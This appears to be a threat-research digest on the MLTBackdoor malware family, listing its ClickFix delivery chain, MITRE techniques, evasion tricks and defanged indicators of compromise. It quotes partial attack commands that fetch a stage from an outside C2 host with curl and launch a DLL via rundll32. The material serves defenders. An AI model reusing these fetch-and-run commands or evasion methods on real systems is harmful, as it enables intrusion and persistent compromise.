Threat Research

Technical Analysis of MLTBackdoor

ZScaler
Technical Analysis of MLTBackdoor
Zscaler ThreatLabz identified MLTBackdoor in May 2026 as a new malware family likely used by a ransomware-related threat actor, delivered through a multi-stage ClickFix chain and designed for post-exploitation with expandable BOF support. It uses heavy MBA and CFF obfuscation, indirect system calls, DGA-backed C2 such as hrs2y15sungu[.]com and cwrtwright[.]com, and encrypted TLS communications to evade analysis and maintain access. #MLTBackdoor #ClickFix #BeaconObjectFiles #hrs2y15sungu[.]com #cwrtwright[.]com

Keypoints

  • ThreatLabz discovered a new malware family called MLTBackdoor in May 2026.
  • The malware is likely tied to ransomware activity and is intended to establish a foothold for lateral movement.
  • Initial delivery used a ClickFix lure on an automotive-related website and executed a staged infection chain.
  • MLTBackdoor is heavily obfuscated with Mixed Boolean-Arithmetic and Control Flow Flattening, plus API hashing and indirect system calls.
  • It includes built-in file and directory commands and a BOF loader to extend functionality dynamically.
  • MLTBackdoor uses a DGA and hardcoded C2 infrastructure to preserve communications if primary servers are unreachable.
  • Its network protocol is custom, encrypted, and disguised to resemble legitimate Microsoft traffic over TLS.

MITRE Techniques

  • [T1059 ] Command and Scripting Interpreter – Used to execute the ClickFix-delivered commands via cmd and run the staged infection chain (‘cmd /c … curl … tar xf … rundll32 …’)
  • [T1105 ] Ingress Tool Transfer – Downloaded the second-stage archive from a remote server (‘curl -skLo … hxxps://hrs2y15sungu[.]com/d’)
  • [T1218.011 ] Signed Binary Proxy Execution: Rundll32 – Used rundll32 to launch the DLL payload (‘rundll32 endpointdlp.dll,#2’)
  • [T1027 ] Obfuscated Files or Information – Used heavy obfuscation including MBA, CFF, and stack-built strings to hinder analysis (‘around 95% of its code is just extra, unnecessary calculations’)
  • [T1027.010 ] Obfuscated Files or Information: Command Obfuscation – Hid strings and logic through fragmented stack construction and flattened state machines (‘the string is built across a flattened state machine’)
  • [T1027.003 ] Obfuscated Files or Information: Embedded Payloads – Stored an encrypted payload inside the archive and decrypted it with RC4 (‘endpointdlp.dll decrypts the RC4-encrypted data.bin file’)
  • [T1055.002 ] Process Injection: Portable Executable Injection – Sideloaded the payload through a legitimate signed Microsoft Defender executable (‘sideloads it via a legitimate signed Microsoft Defender mpextms.exe executable’)
  • [T1106 ] Native API – Resolved Win32 APIs, system calls, and BOF symbols at runtime (‘resolves everything at runtime’)
  • [T1021 ] Remote Services – Exfiltration and lateral-access capabilities were supported through file upload/download and BOF execution within infected systems (‘likely used in ransomware attacks to establish a foothold for lateral movement’)
  • [T1497 ] Virtualization/Sandbox Evasion – Used anti-analysis checks for hypervisors, sandboxes, timing, and debugger detection (‘detect debuggers and sandboxed environments’)
  • [T1480 ] Execution Guardrails – Adjusted behavior based on environment checks and sent anti-analysis flags in initial requests (‘aggregates the results of 10 distinct checks into a bitmask’)
  • [T1036 ] Masquerading – Used Microsoft-like network identifiers and traffic patterns to blend in (‘Microsoft-Delivery-Optimization/10.1’)
  • [T1568.002 ] Dynamic Resolution: Domain Generation Algorithms – Generated daily domains to maintain C2 if servers were unreachable (‘uses a domain generation algorithm’)
  • [T1071.001 ] Application Layer Protocol: Web Protocols – Communicated over TLS on port 443 with a fixed HTTP path to appear legitimate (‘custom encrypted binary protocol over TLS on port 443 with a fixed path (/api/v1/telemetry)’)
  • [T1573.001 ] Encrypted Channel: Symmetric Cryptography – Used AES-256-GCM for session encryption after ECDH key exchange (‘used as an AES-256-GCM session key’)

Indicators of Compromise

  • [SHA256 ] Stage one loader and related samples – 1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984, 46b2155c1e71b840d4b7a2e94410b89a61e2446523e6f497206d402eb02e0e93, and 2 more hashes
  • [SHA256 ] MLTBackdoor binaries and variants – 9e52cc90cff150abe21f0a6440e86e0a99ff383b81061b96def8948e21d0ac66, ced6b0f44410f6133ad63b61e04613a8b56cc3338d7b34497540e9541163e7ec, and 2 more hashes
  • [SHA256 ] Processes and sandbox tools used for anti-analysis – 9e8777661a1ad9c983f03060f0a04a3244daac8c3639b3eb1bbce29355bc6c10 (x64dbg.exe), e063358d88290c5d05d58594da341690024cf7fa57408a3874899f10e56d8bc8 (x32dbg.exe), and other cracked process hashes
  • [Domain ] DGA and C2 infrastructure – hrs2y15sungu[.]com, cwrtwright[.]com, and carrolc[.]com
  • [URL ] Update delivery location – powwowski[.]com/payloads/update.zip
  • [File names ] Delivered and staged files – data.bin, endpointdlp.dll, and update.zip
  • [Network protocol fields ] Custom packet/header indicators – /api/v1/telemetry, Microsoft-Delivery-Optimization/10.1, and x01MLT magic bytes

Read more: https://www.zscaler.com/blogs/security-research/technical-analysis-mltbackdoor

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint